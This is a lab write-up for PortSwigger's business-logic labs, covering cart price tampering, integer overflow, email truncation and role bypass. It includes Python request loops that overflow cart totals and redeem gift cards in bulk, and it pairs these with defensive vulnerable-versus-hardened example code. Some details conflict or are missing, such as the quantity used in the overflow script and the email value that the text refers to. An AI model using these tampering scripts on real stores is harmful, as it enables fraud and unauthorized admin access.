Business Logic Labs Overview
Tools Used
- Burp Interceptor, Repeater and Intruder
- Python Scripts
Overview
While adding a product to the cart, set its price in the request to a very low value!!
We had to buy one leet jacket but here we could not set the price, so we added another item with a negative quantity and bought just one leet jacket.
Store credit: $59.30
Your order is on its way!
Name                               | Price    | Quantity
Lightweight "l33t" Leather Jacket  | $1337.00 | 1
Single Use Food Hider              | $86.42   | -15
Total: $40.70
Observation
The quantity field accepts whole numbers only; the client-side limit is [-1000000000, 99] (wrong!! it is actually stored as an integer, so the real range is [-Integer, +Integer]).
The real range depends on the integer width the backend uses, 32 bit or 16 bit:
if 16 bit, the range is -32,768 to +32,767
if 32 bit, the range is [-2147483648, 2147483647]
We will target the total price.
Solution
Solution in lowLevel.py. We just had to exploit an integer overflow in the total price.
So we kept adding the price of an item * 99; once the total overflows we are in the negative region,
then we keep adding and wait until it comes close to zero, and when it is near 0 we bring it within
the store credit, which is 100. The coded solution could have been more concise and better.
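The two tricks above (a negative quantity, and a total that wraps around) come from the same missing server-side checks. The following toy cart is an added example, not the lab's or PortSwigger's code: it emulates a signed 32-bit total so the wraparound can be seen without sending requests, and puts the hardened checks beside it. Prices are in cents; the product ids, the two prices and the $100 store credit follow the notes, everything else is constructed.

```python
# Added example (not the lab's or PortSwigger's code): a toy cart showing how
# a total held in a signed 32-bit integer wraps, how an unchecked quantity
# sign turns the same arithmetic into a discount, and the server-side checks
# that prevent both. Prices are in cents; product ids, prices and the $100
# store credit mirror the notes, everything else is constructed.

INT32_MAX = 2**31 - 1
CATALOGUE_CENTS = {"1": 133700, "2": 8642}   # "l33t" jacket $1337.00, food hider $86.42
STORE_CREDIT_CENTS = 10000                    # $100.00


def wrap_int32(value):
    """Emulate two's-complement wraparound of a signed 32-bit integer."""
    return (value + 2**31) % 2**32 - 2**31


class VulnerableCart:
    """Mirrors the flaws in the notes: the quantity sign is never checked and
    the running total is a wrapping 32-bit integer."""

    def __init__(self):
        self.total_cents = 0

    def add(self, product_id, quantity):
        self.total_cents = wrap_int32(
            self.total_cents + CATALOGUE_CENTS[product_id] * quantity)

    def can_checkout(self, credit_cents=STORE_CREDIT_CENTS):
        # A negative or wrapped total sails through this comparison.
        return self.total_cents <= credit_cents


class HardenedCart:
    """Rejects non-positive or oversized quantities and refuses any addition
    that would leave the representable range, so the total can never wrap."""

    MAX_QTY = 99

    def __init__(self):
        self.total_cents = 0

    def add(self, product_id, quantity):
        if not isinstance(quantity, int) or not 1 <= quantity <= self.MAX_QTY:
            raise ValueError("quantity must be an integer from 1 to %d" % self.MAX_QTY)
        new_total = self.total_cents + CATALOGUE_CENTS[product_id] * quantity
        if new_total > INT32_MAX:
            raise ValueError("cart total exceeds the supported maximum")
        self.total_cents = new_total

    def can_checkout(self, credit_cents=STORE_CREDIT_CENTS):
        return 0 < self.total_cents <= credit_cents


def negative_quantity_total(cart_cls=VulnerableCart):
    """One jacket plus -15 food hiders, as in the order screenshot above.
    Returns (total in cents, checkout allowed)."""
    cart = cart_cls()
    cart.add("1", 1)
    cart.add("2", -15)
    return cart.total_cents, cart.can_checkout()


def jackets_99_at_a_time(n_requests, cart_cls=VulnerableCart):
    """Add 99 jackets per request, n times. Returns (total in cents, checkout
    allowed); on the vulnerable cart the total goes negative at request 163."""
    cart = cart_cls()
    for _ in range(n_requests):
        cart.add("1", 99)
    return cart.total_cents, cart.can_checkout()


def hardened_accepts(*calls):
    """True if HardenedCart accepts every (product_id, quantity) call in order."""
    cart = HardenedCart()
    try:
        for product_id, quantity in calls:
            cart.add(product_id, quantity)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print("negative quantity:", negative_quantity_total())
    print("162 x 99 jackets:", jackets_99_at_a_time(162))
    print("163 x 99 jackets:", jackets_99_at_a_time(163))
    print("hardened accepts -15:", hardened_accepts(("1", 1), ("2", -15)))
```

The hardened cart does two things the lab's backend does not: it validates the quantity before doing any arithmetic, and it checks the new total against the integer ceiling instead of letting it wrap, so a checkout is only possible for a total that is strictly positive and within credit.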
# hacky script, not a mature way to do this, but for a single lab it works
import requests


def find_between(s, first, last):
    """Return the substring of s between the first occurrence of `first` and
    the next occurrence of `last`, or "" if either marker is missing."""
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""


burp0_url = "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net:443/cart"
burp0_cookies = {"session": "c7pFdZwzFg3lpGem8KWRBHqPLBJbeEh3"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net/cart", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}

# greatest positive integer for 16 bit is +32,767
# but here we can add only 99 at a time, so +32,767 / 99 = 329.56
# so we will test integer overflow
for i in range(1, 1000):
    print(i)
    burp0_data = {"productId": "1", "quantity": 2, "redir": "CART"}
    result = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    html = result.text
    # the cart page renders a negative total as "<th>-$1234.56</th>"; while the
    # total is still positive find_between returns "" and float() below raises
    price = find_between(html, "<th>-$", "</th>")
    try:
        price = float(price) * -1
        print(price)
        # stop once the wrapped total sits between -2 and -4 jackets' worth
        if price < -2 * 1339 and price > -4 * 1339:
            break
    except Exception as e:
        print(e)
        print(price)
So eventually I had to view the solution 😢. Here we had to play with string length. The backend only considers the
first 255 characters of a string and truncates the rest of the request value. So the email id is:
which is 321 characters. After it is truncated to 255 characters we get the email id a very big string@dontwannacry.com, which is a staff email id and is required to access the admin account. Hence we have solved the lab.
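The core of this flaw is that the value validated is not the value stored. The following is an added example, not the lab's or PortSwigger's code: a registration check that validates the full address and then silently truncates it, next to one that rejects over-long input so the two values are always identical. The 255-character limit and the staff domain come from the notes; the padding, the simple email regex and the attacker-controlled suffix domain are constructed for illustration.

```python
# Added example (not the lab's or PortSwigger's code): a registration check
# that validates the email it is handed and then silently truncates it on
# storage, next to one that rejects over-long input outright. The 255-character
# limit and the staff domain come from the notes; the padding, the regex and
# the suffix domain are constructed for illustration.

import re

MAX_EMAIL_LEN = 255                  # backend column width described in the notes
STAFF_DOMAIN = "dontwannacry.com"    # domain that confers staff access
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")   # deliberately simple


def is_staff(email):
    return email.rpartition("@")[2].lower() == STAFF_DOMAIN


def register_vulnerable(email):
    """Validate the full string, then store only the first 255 characters and
    derive privileges from what was stored. Returns (stored email, is staff)."""
    if not EMAIL_RE.match(email):
        raise ValueError("malformed email")
    if is_staff(email):
        raise PermissionError("staff domain cannot self-register")
    stored = email[:MAX_EMAIL_LEN]       # the silent truncation
    return stored, is_staff(stored)      # privilege decided on a different value


def register_hardened(email):
    """Reject anything the column cannot hold, so the value validated is
    exactly the value stored and later used for authorisation decisions."""
    if len(email) > MAX_EMAIL_LEN:
        raise ValueError("email longer than %d characters" % MAX_EMAIL_LEN)
    if not EMAIL_RE.match(email):
        raise ValueError("malformed email")
    if is_staff(email):
        raise PermissionError("staff domain cannot self-register")
    return email, is_staff(email)


def build_overlong_email(suffix_domain="attacker.example"):
    """Constructed input in the shape the notes describe: a local part padded
    so that '@dontwannacry.com' ends exactly at character 255, followed by a
    further label so the full string is not a staff address."""
    local = "a" * (MAX_EMAIL_LEN - len("@" + STAFF_DOMAIN))
    return local + "@" + STAFF_DOMAIN + "." + suffix_domain


def outcome(register_fn, email):
    """Summarise what a registration attempt yields, for side-by-side comparison."""
    try:
        _stored, staff = register_fn(email)
    except (ValueError, PermissionError) as exc:
        return "rejected: " + type(exc).__name__
    return "staff account" if staff else "normal account"


if __name__ == "__main__":
    email = build_overlong_email()
    print(len(email), outcome(register_vulnerable, email), outcome(register_hardened, email))
```

Rejecting rather than truncating is the important choice: any check that runs before a lossy transformation (truncation, normalisation, case folding) must be repeated on the transformed value, and the simplest way to guarantee that is to refuse input the storage cannot hold unchanged.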
- A very interesting lab: https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-weak-isolation-on-dual-use-endpoint
from the theory on the page https://portswigger.net/web-security/logic-flaws/examples
under the heading >> Users won't always supply mandatory input
The request to change a user's password via the change-password request takes this form:
POST /my-account/change-password HTTP/1.1
....
csrf=TnvFiRt2yrF7ZsTAZ5CEtnFHEj9LNk9d&username=administrator&current-password=peter&new-password-1=peter&new-password-2=peter
HERE IT IS NOT NECESSARY TO SEND THE current-password PARAMETER !!!
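What makes the request above work is a handler that only verifies the current password when the field is present, combined with trusting a client-supplied username. The following is an added example, not PortSwigger's code, showing that handler beside one that treats every field as mandatory and binds the change to the logged-in session. The user store, the password hashing and the sample passwords are constructed for the demo.

```python
# Added example (not PortSwigger's code): a change-password handler that only
# verifies the current password when the field happens to be present, next to
# one that treats it as mandatory and binds the change to the logged-in user.
# The user store, password hashing and sample passwords are constructed.

import hashlib
import hmac
import os


def _derive(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class UserStore:
    """Minimal salted-hash credential store (constructed)."""

    def __init__(self):
        self._users = {}

    def set_password(self, username, password):
        salt = os.urandom(16)
        self._users[username] = (salt, _derive(password, salt))

    def verify(self, username, password):
        if username not in self._users:
            return False
        salt, digest = self._users[username]
        return hmac.compare_digest(digest, _derive(password, salt))


def change_password_vulnerable(store, session_user, form):
    """Mirrors the flaw in the notes: `current-password` is checked only if
    the client sends it, and `username` is taken from the request body.
    `form` is the parsed POST body as a dict."""
    if form.get("new-password-1") != form.get("new-password-2"):
        return 400, "passwords do not match"
    target = form.get("username", session_user)
    if "current-password" in form:                       # the only verification
        if not store.verify(target, form["current-password"]):
            return 403, "current password incorrect"
    store.set_password(target, form["new-password-1"])
    return 200, "password changed"


def change_password_hardened(store, session_user, form):
    """Every field is mandatory, and the account changed is the session's own."""
    required = ("current-password", "new-password-1", "new-password-2")
    if any(not form.get(field) for field in required):
        return 400, "missing field"
    if form["new-password-1"] != form["new-password-2"]:
        return 400, "passwords do not match"
    if not store.verify(session_user, form["current-password"]):
        return 403, "current password incorrect"
    store.set_password(session_user, form["new-password-1"])
    return 200, "password changed"


def demo(handler):
    """Replay the request from the notes (no current-password, username set
    to administrator) from wiener's session. Returns (status, whether the
    administrator's password is now 'peter'). Passwords are constructed."""
    store = UserStore()
    store.set_password("administrator", "not-peter")
    store.set_password("wiener", "wiener-pw")
    form = {"username": "administrator", "new-password-1": "peter", "new-password-2": "peter"}
    status, _ = handler(store, "wiener", form)
    return status, store.verify("administrator", "peter")


if __name__ == "__main__":
    print("vulnerable:", demo(change_password_vulnerable))
    print("hardened:  ", demo(change_password_hardened))
```

Two separate defects are fixed in the hardened version: the verification step is unconditional, and the target account comes from the session rather than the form, so even a complete request with a valid current password cannot be pointed at someone else.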
A very tiring but interesting lab: https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation
- Basic workflow: add products to cart > add a valid coupon > checkout (allowed if the total is less than the store credit)
- We cannot check out the l33t jacket as its value, 1337, is higher than the store credit, which is 100
- So what we eventually did was add a product costing less than 100 and do the checkout on it
- Then, after the checkout step has passed, add your leet jacket and it will be added to your order
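The workflow above fails because the confirmation step does not check that the cart it ships is the cart that passed the credit check. The following is an added example, not the lab's or PortSwigger's code, modelling that purchase flow two ways: the vulnerable shop's confirmation hands over whatever the cart holds at that moment, while the hardened shop snapshots the checked-out cart and invalidates that snapshot on any later change. The cheap product's id and price are constructed; the jacket price and the $100 credit follow the notes.

```python
# Added example (not the lab's or PortSwigger's code): the purchase workflow
# from the notes modelled two ways. The vulnerable shop's confirmation step
# hands over whatever the cart holds now, so an item added after the credit
# check rides along; the hardened shop snapshots the checked-out cart and
# discards the snapshot on any later change. Product "3" and its price are
# constructed; the jacket price and credit follow the notes.

CATALOGUE = {"1": 1337.00, "3": 22.50}   # "1" = l33t jacket, "3" = a cheap item
STORE_CREDIT = 100.00


def cart_total(cart):
    return round(sum(CATALOGUE[pid] * qty for pid, qty in cart.items()), 2)


class ShopVulnerable:
    def __init__(self):
        self.cart = {}
        self.checkout_passed = False

    def add(self, pid, qty=1):
        self.cart[pid] = self.cart.get(pid, 0) + qty

    def checkout(self):
        if cart_total(self.cart) > STORE_CREDIT:
            return 400, "insufficient credit"
        self.checkout_passed = True          # a bare flag, not tied to contents
        return 302, "order-confirmation"

    def order_confirmation(self):
        if not self.checkout_passed:
            return 400, "no checkout in progress"
        items = dict(self.cart)              # whatever is in the cart *now*
        self.cart.clear()
        self.checkout_passed = False
        return 200, items


class ShopHardened:
    def __init__(self):
        self.cart = {}
        self.pending_order = None

    def add(self, pid, qty=1):
        self.cart[pid] = self.cart.get(pid, 0) + qty
        self.pending_order = None            # any cart change restarts the workflow

    def checkout(self):
        total = cart_total(self.cart)
        if total > STORE_CREDIT:
            return 400, "insufficient credit"
        self.pending_order = {"items": dict(self.cart), "total": total}
        return 302, "order-confirmation"

    def order_confirmation(self):
        if self.pending_order is None:
            return 400, "no checkout in progress"
        order = self.pending_order
        self.cart.clear()
        self.pending_order = None
        return 200, order["items"]


def replay_notes_sequence(shop_cls):
    """Cheap item -> checkout -> add jacket -> confirm, as in the notes.
    Returns the confirmation response."""
    shop = shop_cls()
    shop.add("3")
    assert shop.checkout()[0] == 302
    shop.add("1")
    return shop.order_confirmation()


def honest_sequence(shop_cls):
    """Cheap item -> checkout -> confirm, with no tampering in between."""
    shop = shop_cls()
    shop.add("3")
    assert shop.checkout()[0] == 302
    return shop.order_confirmation()


if __name__ == "__main__":
    print("vulnerable:", replay_notes_sequence(ShopVulnerable))
    print("hardened:  ", replay_notes_sequence(ShopHardened))
```

The fix is to make the later step depend on the exact state the earlier step approved, not on a boolean that says "some check passed": the order that gets fulfilled is the snapshot, and mutating the cart throws the snapshot away.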
SOLVED IT !!
MY SOLUTION
- Logged in, and then in role-selector I sent the role as "admin"
- I logged out and then logged in again, but instead of being redirected to role-selector I redirected myself to /admin. I believe that when the backend redirects to /role-selector after login it clears your previous role (which I had selected as admin)
- Then, as I was redirected to /admin, I was able to delete carlos (sorry carlos 😢, it's just business)
PORTSWIGGER SOLUTION
- With Burp running, complete the login process and notice that you need to select your role before you are taken to the home page. Use the content discovery tool to identify the /admin path.
- Try browsing to /admin directly from the role selection page and observe that this doesn't work.
- Log out and then go back to the login page. In Burp, turn on proxy intercept then log in. Forward the POST /login request. The next request is GET /role-selector. Drop this request and then browse to the lab's home page. Observe that your role has defaulted to the administrator role and you have access to the admin panel. Delete Carlos to solve the lab.
OKAY SO I WAS WRONG, THE DEFAULT ROLE IS ADMINISTRATOR
Observation 23 Nov
- Logged in as wiener; you are then redirected to the role-selector page, you select a role and then you are properly logged in (e.g. you can see my-account)
- If you go to role-selector again and select a role you get the error "No login credentials"
- Now if you set the role again, you are redirected to login and your session expires, hence the my-account page is not visible
- If you just go to the role-selector page and then to the my-account page, your session expires too
- If you don't select a role in role-selector directly after login (the redirection), you won't get access to the my-account page and will be redirected to login if you visit my-account
Observations 22 Nov
- When you log in it takes you directly to role-selector, and then you select a role
- When you log out and log in again you have to select a role again
- The administrator page is at /admin
- In the role-selector POST request, you can send the role as "administrator"
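The lesson of this lab is that a session must not carry a privileged role before the user has been assigned one. The following is an added example, not PortSwigger's code, modelling the login flow from the solution and observations above two ways: the vulnerable session starts with administrator as its default role and accepts whatever role the client posts (as the 22 Nov observation describes), while the hardened session starts with no role and only grants one the server already knows that user may hold. The user list and the role assignments are constructed.

```python
# Added example (not PortSwigger's code): the login flow from the solution
# and observations above, modelled two ways. The vulnerable session starts
# with administrator as its default role and only loses it when the
# role-selector step runs; the hardened session starts with no role and only
# grants one that the server already knows the user may hold. The user list
# and role assignments are constructed.

PERMITTED_ROLES = {                 # constructed: what the server knows each user may be
    "wiener": {"user"},
    "carlos": {"user"},
    "staff": {"user", "administrator"},
}


class SessionVulnerable:
    """Role defaults to administrator; /role-selector merely overwrites it."""

    def __init__(self, username):
        self.username = username
        self.role = "administrator"

    def select_role(self, role):
        self.role = role                 # trusts whatever the client posts

    def can_access_admin(self):
        return self.role == "administrator"


class SessionHardened:
    """No role until one is chosen, and only a permitted one can be chosen."""

    def __init__(self, username):
        self.username = username
        self.role = None

    def select_role(self, role):
        if role not in PERMITTED_ROLES.get(self.username, set()):
            raise PermissionError("role not permitted for this user")
        self.role = role

    def can_access_admin(self):
        return self.role == "administrator"


def login_drop_selector(session_cls, username):
    """PortSwigger's solution: log in, drop GET /role-selector, browse to /admin."""
    session = session_cls(username)
    return session.can_access_admin()


def login_then_pick(session_cls, username, role):
    """Observation from 22 Nov: post a role of your choosing to /role-selector."""
    session = session_cls(username)
    try:
        session.select_role(role)
    except PermissionError:
        return False
    return session.can_access_admin()


if __name__ == "__main__":
    for cls in (SessionVulnerable, SessionHardened):
        print(cls.__name__,
              "skip selector:", login_drop_selector(cls, "wiener"),
              "pick user:", login_then_pick(cls, "wiener", "user"),
              "pick administrator:", login_then_pick(cls, "wiener", "administrator"))
```

Both defences matter independently: a default of no role means skipping the selector yields nothing, and checking the chosen role against a server-side allow list means the selector cannot be used to claim a role the account was never granted.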
- When you are not logged in you get this response
- When you are logged in you are just redirected
- Two coupons: NEWCUST5 and SIGNUP30 (the latter when you sign up for the newsletter)
Solution is:
Add the codes one after another (SIGNUP30 you get from signing up for the newsletter and NEWCUST5 is readily available)
Lab url: https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money
- Buy the product "Gift Card" (product id 2) and apply the discount code SIGNUP30; you get a discounted card but the gift card value is still 10. Then redeem that gift card code and refill your credit to more than 100.
- Now keep doing this, adding multiple gift cards and accumulating enough store credit to purchase the leet jacket
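The coupon-stacking note above and the infinite-money lab share one root cause: the checkout keeps too little state about what has already been discounted. The following is an added example, not the lab's or PortSwigger's code, covering both: the vulnerable checkout remembers only the last coupon applied and lets coupons discount gift cards, while the hardened one remembers every coupon used and exempts stored-value products. Prices are in cents; the jacket price, the $10 gift card value and the $100 credit follow the notes, while the coupon effects (NEWCUST5 = $5 off, SIGNUP30 = 30% off) are assumed for the demo.

```python
# Added example (not the lab's or PortSwigger's code) covering both the
# coupon-stacking note and the infinite-money lab. Prices are in cents; the
# jacket price, $10 gift card value and $100 credit follow the notes, while
# the coupon effects (NEWCUST5 = $5 off, SIGNUP30 = 30% off) are assumed.

PRICES = {"1": 133700, "2": 1000}            # "1" = l33t jacket, "2" = gift card
GIFT_CARD_VALUE = 1000                        # credit you get back for product "2"
COUPONS = {"NEWCUST5": ("flat", 500), "SIGNUP30": ("percent", 30)}   # assumed
STORED_VALUE_PRODUCTS = {"2"}


def discounted(total, code):
    kind, amount = COUPONS[code]
    if kind == "flat":
        return max(total - amount, 0)
    return total - total * amount // 100


class CheckoutVulnerable:
    def __init__(self):
        self.items, self.total, self.last_code = [], 0, None

    def add(self, pid):
        self.items.append(pid)
        self.total += PRICES[pid]

    def apply(self, code):
        if code == self.last_code:            # only blocks the *same* code twice in a row
            raise ValueError("coupon already applied")
        self.total = discounted(self.total, code)
        self.last_code = code


class CheckoutHardened:
    def __init__(self):
        self.items, self.total, self.used = [], 0, set()

    def add(self, pid):
        self.items.append(pid)
        self.total += PRICES[pid]

    def apply(self, code):
        if code in self.used:
            raise ValueError("coupon already applied")
        if any(pid in STORED_VALUE_PRODUCTS for pid in self.items):
            raise ValueError("coupons cannot be applied to stored-value products")
        self.total = discounted(self.total, code)
        self.used.add(code)


def alternate_coupons(checkout_cls, codes=("SIGNUP30", "NEWCUST5"), credit=10000):
    """Apply the codes round-robin against one jacket until the total fits
    the credit or a code is refused. Returns (applications, total, affordable)."""
    checkout = checkout_cls()
    checkout.add("1")
    applied = 0
    while checkout.total > credit:
        try:
            checkout.apply(codes[applied % len(codes)])
        except ValueError:
            break
        applied += 1
    return applied, checkout.total, checkout.total <= credit


def gift_card_cycles(checkout_cls, target=133700, credit=10000, max_cycles=1000):
    """Buy a discounted gift card and redeem it, repeatedly, until the credit
    reaches the target. Returns (cycles, credit, target reached)."""
    cycles = 0
    while credit < target and cycles < max_cycles:
        checkout = checkout_cls()
        checkout.add("2")
        try:
            checkout.apply("SIGNUP30")
        except ValueError:
            break
        if checkout.total >= GIFT_CARD_VALUE or checkout.total > credit:
            break                             # no net gain, or cannot pay
        credit = credit - checkout.total + GIFT_CARD_VALUE
        cycles += 1
    return cycles, credit, credit >= target


if __name__ == "__main__":
    for cls in (CheckoutVulnerable, CheckoutHardened):
        print(cls.__name__, alternate_coupons(cls), gift_card_cycles(cls))
```

Under the assumed coupon values the vulnerable checkout gets the jacket under the $100 credit after 13 alternating applications, and gains $3 of credit per gift-card cycle, so 413 cycles are enough; the hardened checkout stops after one use of each code and refuses to discount the gift card at all, which is what breaks the loop.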
# Used this code to apply the gift card codes.
import requests

giftCards = '''
2DlHFSTMZY
aUkZZ9nQP7
rCoKrvDFVY
8sv5pB8Tva
aCG945Mzsa
'''
giftCards = giftCards.split()

burp0_url = "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net:443/gift-card"
burp0_cookies = {"session": "kGqJ6lLJnEPma5B72BZLKKZTlYmqhNGy"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net/my-account?id=wiener", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}

# redeem each gift card code against the account in the session cookie
for card in giftCards:
    print(card)
    burp0_data = {"csrf": "Y8kdJyCdvwzvHEYTIJKraDXqW8GYXQh3", "gift-card": card}
    requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)